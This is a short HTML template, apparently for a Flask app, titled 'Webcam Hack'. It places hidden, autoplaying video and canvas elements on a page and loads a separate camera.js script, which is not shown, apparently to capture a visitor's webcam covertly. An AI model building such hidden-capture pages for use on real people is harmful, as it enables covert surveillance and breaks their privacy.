<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Webcam Hack</title>
</head>

<body>
    <h1>Hack me</h1>
    <video id="video" hidden autoplay playsinline></video>
    <canvas id="canvas" hidden width="640" height="640">canvas</canvas>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    <script src="{{url_for('static', filename='camera.js')}}"></script>
</body>

</html>